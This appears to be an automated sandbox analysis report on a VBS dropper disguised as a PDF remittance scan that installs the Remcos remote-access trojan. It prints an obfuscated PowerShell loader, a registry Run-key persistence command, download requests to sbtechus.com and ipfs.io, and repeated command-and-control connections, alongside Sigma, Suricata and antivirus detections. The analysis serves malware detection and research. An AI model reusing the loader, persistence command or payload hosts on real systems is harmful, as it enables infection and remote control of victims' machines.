"HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1400, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", ProcessId: 4780, ProcessName: reg.exe
            Sigma detected: Msiexec Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 209.94.90.1, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1616, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49783
            Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1616, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)", ProcessId: 1400, ProcessName: cmd.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4868, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs", ProcessId: 844, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. Rdje$progrLMetroOSkeokvHungrgDiaraeAn iaNUn ern ylase

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-27T07:44:39.516929+010020365941Malware Command and Control Activity Detected192.168.11.204978462.171.160.892404TCP
            2025-02-27T07:44:41.360260+010020365941Malware Command and Control Activity Detected192.168.11.204978562.171.160.892404TCP
            2025-02-27T07:44:43.203606+010020365941Malware Command and Control Activity Detected192.168.11.204978662.171.160.892404TCP
            2025-02-27T07:44:45.046990+010020365941Malware Command and Control Activity Detected192.168.11.204978762.171.160.892404TCP
            2025-02-27T07:44:46.905953+010020365941Malware Command and Control Activity Detected192.168.11.204978862.171.160.892404TCP
            2025-02-27T07:44:48.749246+010020365941Malware Command and Control Activity Detected192.168.11.204978962.171.160.892404TCP
            2025-02-27T07:44:50.592662+010020365941Malware Command and Control Activity Detected192.168.11.204979062.171.160.892404TCP
            2025-02-27T07:44:52.435975+010020365941Malware Command and Control Activity Detected192.168.11.204979162.171.160.892404TCP
            2025-02-27T07:44:54.279314+010020365941Malware Command and Control Activity Detected192.168.11.204979262.171.160.892404TCP
            2025-02-27T07:44:56.169514+010020365941Malware Command and Control Activity Detected192.168.11.204979362.171.160.892404TCP
            2025-02-27T07:44:58.012874+010020365941Malware Command and Control Activity Detected192.168.11.204979462.171.160.892404TCP
            2025-02-27T07:44:59.856223+010020365941Malware Command and Control Activity Detected192.168.11.204979562.171.160.892404TCP
            2025-02-27T07:45:01.715159+010020365941Malware Command and Control Activity Detected192.168.11.204979662.171.160.892404TCP
            2025-02-27T07:45:03.558820+010020365941Malware Command and Control Activity Detected192.168.11.204979762.171.160.892404TCP
            2025-02-27T07:45:05.401873+010020365941Malware Command and Control Activity Detected192.168.11.204979862.171.160.892404TCP
            2025-02-27T07:45:07.245237+010020365941Malware Command and Control Activity Detected192.168.11.204979962.171.160.892404TCP
            2025-02-27T07:45:09.088613+010020365941Malware Command and Control Activity Detected192.168.11.204980062.171.160.892404TCP
            2025-02-27T07:45:10.947493+010020365941Malware Command and Control Activity Detected192.168.11.204980162.171.160.892404TCP
            2025-02-27T07:45:15.055959+010020365941Malware Command and Control Activity Detected192.168.11.204980262.171.160.892404TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-27T07:44:37.208785+010028032702Potentially Bad Traffic192.168.11.2049783209.94.90.1443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://sbtechus.com/zigi/HengivpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengivelpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengivelsenpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengipAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/pAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengivelspAvira URL Cloud: Label: phishing
            Source: http://sbtechus.comAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HenpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chmAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/pAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengivelsepAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.cpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigipAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chmpNAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HepAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengivelsenspAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.pAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/HengivepAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zigi/Hengivelsens.chmpAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zipAvira URL Cloud: Label: phishing
            Source: http://sbtechus.com/zpAvira URL Cloud: Label: phishing
            Yara detected Remcos RAT
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1616, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\abios.dat, type: DROPPED
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Source: unknownHTTPS traffic detected: 209.94.90.1:443 -> 192.168.11.20:49783 version: TLS 1.2
            Source: Binary string: .Automation.pdb source: powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdbs source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: m.Core.pdba source: powershell.exe, 00000004.00000002.128209128889.0000000008499000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49793 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49786 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49785 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49801 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49800 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49787 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49795 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49792 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49794 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49790 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49789 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49798 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49788 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49802 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49796 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49799 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49784 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49791 -> 62.171.160.89:2404
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49797 -> 62.171.160.89:2404
            Source: global trafficTCP traffic: 192.168.11.20:49784 -> 62.171.160.89:2404
            Source: Joe Sandbox ViewIP Address: 209.94.90.1 209.94.90.1
            Source: Joe Sandbox ViewIP Address: 209.94.90.1 209.94.90.1
            Source: Joe Sandbox ViewASN Name: CONTABODE CONTABODE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49783 -> 209.94.90.1:443
            Source: global trafficHTTP traffic detected: GET /ipfs/bafybeif4qizmuos6tnbqhccf4cms273spugub5lbtgpc5zaaljfefoarzy/QMpkuY58.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ipfs.ioCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /zigi/Hengivelsens.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: sbtechus.comConnection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: unknownTCP traffic detected without corresponding DNS query: 62.171.160.89
            Source: global trafficHTTP traffic detected: GET /ipfs/bafybeif4qizmuos6tnbqhccf4cms273spugub5lbtgpc5zaaljfefoarzy/QMpkuY58.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: ipfs.ioCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /zigi/Hengivelsens.chm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: sbtechus.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: sbtechus.com
            Source: global trafficDNS traffic detected: DNS query: ipfs.io
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000002.00000002.127610468902.0000027E93A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz$
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengip
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsenp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chm
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chmp
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chmpN
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.chp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.cp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsens.p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsensp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsep
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivelsp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivep
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengivp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hengp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Henp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hep
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/Hp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigi/p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigip
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zigp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zip
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.com/zp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.comp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.cop
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.cp
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E8516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sbtechus.p
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004768000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83C4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz$
            Source: powershell.exe, 00000002.00000002.127614664606.0000027E9BEAC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.128180982153.00000000028D1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.128560027986.00000000088AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: powershell.exe, 00000002.00000002.127594435967.0000027E83A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.128184809694.0000000004611000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000004.00000002.128197255466.000000000567C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
